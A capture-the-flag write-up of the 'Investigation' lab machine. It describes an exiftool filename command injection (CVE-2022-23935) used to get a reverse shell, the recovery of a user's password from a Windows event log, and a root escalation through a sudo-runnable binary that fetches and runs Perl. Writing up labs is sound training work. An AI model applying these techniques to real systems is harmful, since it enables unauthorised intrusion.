Investigation

Enumeration

The Nmap result shows two open ports, Port 22 and 80.

The Page didn't load when I used the IP but it resolved to eforenzics.htb so to view the page I had to add the IP address and domain to my /etc/hosts file.

The index page has link to a "free image forensics service". Decided to play around the upload service. Once you upload a valid Image, it runs exiftool on the image and prints out the image metadata in txt format.

I noticed a version number on the metadata generated, looked it up and it's a vulnerable version tagged CVE-2022-23935 (https://gist.github.com/ert-plus/1414276e4cb5d56dd431c2f0429e4429)


"Exiftool versions < 12.38 are vulnerable to Command Injection through a crafted filename. If the filename passed to exiftool ends with a pipe character | and exists on the filesystem, then the file will be treated as a pipe and executed as an OS command."

So, to exploit this, we need to upload a file with a crafted filename that ends with the pipe character (|)

To exploit, I created a reverse shell called shell.sh and used a base64 encoded curl command as the "/" character is not allowed in file name, I used the pipe character to decode the shell once it got to the target machine.

Once, the image got uploaded, I got a reverse shell as www-data

Now, I got a shell and from the /etc/passwd file there are just two users, root and smorton.

USER

After trying all basic exploits with no headway, I decided to check if there is any running scheduled task through cron and there indeed was a folder called investigation in /usr/local.

navigated to the directory and found a .msg file which is usually a mail content. I copied the file to my machine through nc for further exploration

Since There is no suitable tool on Linux to render the mail file I used an online tool https://msgeml.com/

The mail also has a compressed attachment of evtx file which is a windows event log file. the file wasn't human readable but fortunately there is a Linux tool called evtxexport which put the file in XML format.

After extensively digging through ~700,000 lines file I found the password for user Smorton

Using the above password, I was able to get SSH access to Smorton account and hence the user flag

Privilege Escalation

I uploaded Linpeas.sh but no luck with PrivEsc. Using sudo -l to see what I can do as root, See there was a file in /usr/bin/binary that I can run as root. running the binary by itself it prints "Exiting" so it's really though to say what it does.

To have a closer look, I copied the binary file to my system and used an online tool called dogbolt to debug.

From the code, I notices:

  • The file checks if the file name is used otherwise it Exits

  • It checks if sudo (user id of value 0) is the one running the program otherwise it Exits

  • it checks if the string "" is applied to the code otherwise it Exits

  • It uses curl to visit a URL to a File

  • It runs Perl on the files

From the above, There was a subtle exploit, since I can run this file as root, Why not try GTFOBINs Perl shell exploit to escalate my Privilege


And like that, I was able to xcalate my privilege to root